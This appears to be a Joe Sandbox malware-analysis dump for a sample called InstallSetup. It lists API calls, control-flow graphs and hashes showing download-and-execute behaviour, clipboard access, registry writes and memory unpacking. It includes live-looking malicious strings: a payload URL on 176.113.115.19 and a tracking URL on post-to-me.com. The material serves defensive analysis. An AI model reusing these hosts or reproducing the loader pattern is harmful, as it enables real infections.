                                                                                                • EmptyClipboard.USER32 ref: 004018D2
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                • CloseClipboard.USER32 ref: 0040193D
                                                                                                • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                • String ID: i
                                                                                                • API String ID: 1583243082-3865851505
                                                                                                • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                • String ID: .exe$<$ShareScreen
                                                                                                • API String ID: 3323492106-493228180
                                                                                                • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00C016DE
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00C016FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 6319b9342f89a6058f45fb31a4f4ce8e8c9e7b69beb5de2a55a9ea06e482c83f
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: 38F062356007106FD7203AF99C8DA6BB6E8EF49725F180528FA52914C0DA71ED458A61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 92 43d35e-43d364 83->92 84->83 94 43d162-43d16b GetFileType 85->94 95 43d0f7-43d100 85->95 98 43d1b4-43d1b7 94->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 94->99 96 43d102-43d106 95->96 97 43d137-43d15d GetLastError call 42ea93 95->97 96->97 101 43d108-43d135 call 43cd0a 96->101 97->83 104 43d1c0-43d1c6 98->104 105 43d1b9-43d1be 98->105 99->83 113 43d1a4-43d1af call 42eac9 99->113 101->94 101->97 106 43d1ca-43d218 call 4396c7 104->106 107 43d1c8 104->107 105->106 116 43d21a-43d226 call 43cf1b 106->116 117 43d228-43d24c call 43cabd 106->117 107->106 113->83 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->92 126 43d2c3-43d2d1 124->126 127 43d2a4-43d2a8 124->127 125->123 130 43d2d7-43d2db 126->130 131 43d35c 126->131 127->126 129 43d2aa-43d2be 127->129 129->126 130->131 133 43d2dd-43d310 CloseHandle call 43cd0a 130->133 131->92 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->131
                                                                                                APIs
                                                                                                  • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                • GetLastError.KERNEL32 ref: 0043D150
                                                                                                • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                • GetLastError.KERNEL32 ref: 0043D312
                                                                                                • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 158 4332d5 144->158 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 164 4332d8-4332dd 158->164 161->162 163 432fcd-432fd1 161->163 162->164 163->156 167 432fd3-432fea 163->167 165->158 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 207 4331f0 175->207 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 183 4330c3-4330d3 177->183 184 433191-43319a call 43d365 177->184 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 183->184 185 4330d9-4330db 183->185 196 43320d 184->196 197 43319c-4331ae 184->197 185->184 189 4330e1-433107 185->189 189->184 193 43310d-433120 189->193 193->184 198 433122-433124 193->198 200 433211-433229 ReadFile 196->200 197->196 202 4331b0-4331bf GetConsoleMode 197->202 198->184 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 202->196 208 4331c1-4331c5 202->208 203->184 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->200 216 4331c7-4331e1 ReadConsoleW 208->216 209->164 210->184 220 433168-43316a 210->220 211->177 212->207 213->207 217 4332b2-4332b4 214->217 218 4331e9-4331ef call 42ea93 214->218 224 433236-433248 215->224 225 4331e3 GetLastError 216->225 226 433202-43320b 216->226 217->209 218->207 220->184 229 43316c-43318c 220->229 224->209 233 43324a-43324e 224->233 225->218 226->224 229->184 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 239 433274 call 432d95 238->239 240 43327e-433283 call 432a85 238->240 248 433279-43327c 239->248 240->248 247->209 248->247
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 250 94003c-940047 251 94004c-940263 call 940a3f call 940e0f call 940d90 VirtualAlloc 250->251 252 940049 250->252 267 940265-940289 call 940a69 251->267 268 94028b-940292 251->268 252->251 273 9402ce-9403c2 VirtualProtect call 940cce call 940ce7 267->273 270 9402a1-9402b0 268->270 272 9402b2-9402cc 270->272 270->273 272->270 279 9403d1-9403e0 273->279 280 9403e2-940437 call 940ce7 279->280 281 940439-9404b8 VirtualFree 279->281 280->279 283 9405f4-9405fe 281->283 284 9404be-9404cd 281->284 287 940604-94060d 283->287 288 94077f-940789 283->288 286 9404d3-9404dd 284->286 286->283 292 9404e3-940505 LoadLibraryA 286->292 287->288 293 940613-940637 287->293 290 9407a6-9407b0 288->290 291 94078b-9407a3 288->291 294 9407b6-9407cb 290->294 295 94086e-9408be LoadLibraryA 290->295 291->290 296 940517-940520 292->296 297 940507-940515 292->297 298 94063e-940648 293->298 299 9407d2-9407d5 294->299 302 9408c7-9408f9 295->302 300 940526-940547 296->300 297->300 298->288 301 94064e-94065a 298->301 303 940824-940833 299->303 304 9407d7-9407e0 299->304 305 94054d-940550 300->305 301->288 306 940660-94066a 301->306 308 940902-94091d 302->308 309 9408fb-940901 302->309 307 940839-94083c 303->307 310 9407e4-940822 304->310 311 9407e2 304->311 312 940556-94056b 305->312 313 9405e0-9405ef 305->313 314 94067a-940689 306->314 307->295 315 94083e-940847 307->315 309->308 310->299 311->303 318 94056d 312->318 319 94056f-94057a 312->319 313->286 316 940750-94077a 314->316 317 94068f-9406b2 314->317 322 940849 315->322 323 94084b-94086c 315->323 316->298 324 9406b4-9406ed 317->324 325 9406ef-9406fc 317->325 318->313 320 94057c-940599 319->320 321 94059b-9405bb 319->321 333 9405bd-9405db 320->333 321->333 322->295 323->307 324->325 327 9406fe-940748 325->327 328 94074b 325->328 327->328 328->314 333->305
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0094024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: 0f2563c088c55e369c8b99a75913258639d7b91ed0990f4b75a4850b41703535
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: F1526774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB351DB34AE85DF14

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                • API String ID: 3067768807-1501832161
                                                                                                • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                • String ID:
                                                                                                • API String ID: 1687354797-0
                                                                                                • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                • String ID:
                                                                                                • API String ID: 2059591211-0
                                                                                                • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastThread
                                                                                                • String ID: F(@
                                                                                                • API String ID: 1611280651-2698495834
                                                                                                • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 449 42e185-42e188 436->449 442 42e176 437->442 443 42e14a-42e167 CreateThread 437->443 447 42e178-42e184 call 42e03d 442->447 445 42e189-42e18e 443->445 446 42e169-42e175 GetLastError call 42ea93 443->446 452 42e190-42e193 445->452 453 42e195-42e197 445->453 446->442 447->449 452->453 453->447
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2744730728-0
                                                                                                • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2336955059-0
                                                                                                • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                APIs
                                                                                                • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID:
                                                                                                • API String ID: 1818849710-0
                                                                                                • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                APIs
                                                                                                  • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                  • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                  • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                • ExitThread.KERNEL32 ref: 0042E086
                                                                                                • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                • String ID:
                                                                                                • API String ID: 1198197534-0
                                                                                                • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePostProcQuitWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3873111417-0
                                                                                                • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$Sleep
                                                                                                • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                • API String ID: 3358372957-3120454669
                                                                                                • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
